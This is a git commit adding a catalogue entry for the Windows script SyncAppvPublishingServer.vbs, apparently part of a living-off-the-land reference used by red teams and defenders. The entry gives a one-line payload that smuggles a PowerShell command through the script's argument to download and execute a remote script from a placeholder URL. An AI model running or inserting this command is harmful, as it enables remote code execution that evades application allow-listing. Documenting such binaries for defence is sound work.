Add SyncAppvPublishingServer.vbs

master
Chris Bisnett 2018-04-23 22:00:37 -04:00
parent b5edf3240a
commit 75399d8c55
No known key found for this signature in database
GPG Key ID: AE74082B6B81A58C
2 changed files with 30 additions and 1 deletions

View File

@ -7,6 +7,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
[Cl_invocation.ps1](OSScripts/Cl_invocation.md)
[Manage-bde.vbs](OSScripts/Manage-bde.md)
[Slmgr.vbs](OSScripts/Slmgr.md)
[Pubprn.vbs](OSScripts/Pubprn.md)
[Slmgr.vbs](OSScripts/Slmgr.md)
[Syncappvpublishingserver.vbs(OSScripts/Syncappvpublishingserver.vbs)
[Winrm.vbs](OSScripts/Winrm.md)

View File

@ -0,0 +1,28 @@
## SyncAppvPublishingServer.vbs
* Functions: Execute
```
SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
```
Acknowledgements:
* Nick Landers - @monoxgas
* Casey Smith - @subTee
Code sample:
Resources:
* https://twitter.com/monoxgas/status/895045566090010624
* https://twitter.com/subTee/status/855738126882316288
Full path:
```
C:\Windows\System32\SyncAppvPublishingServer.vbs
```
Notes:
Just like [SyncAppvPublishingServer.exe](OSBinaries/Syncappvpublishingserver.md) this starts a Powershell script with the provided arguments.
Included with Windows 10 Enterprise. Script is catalog signed by Microsoft.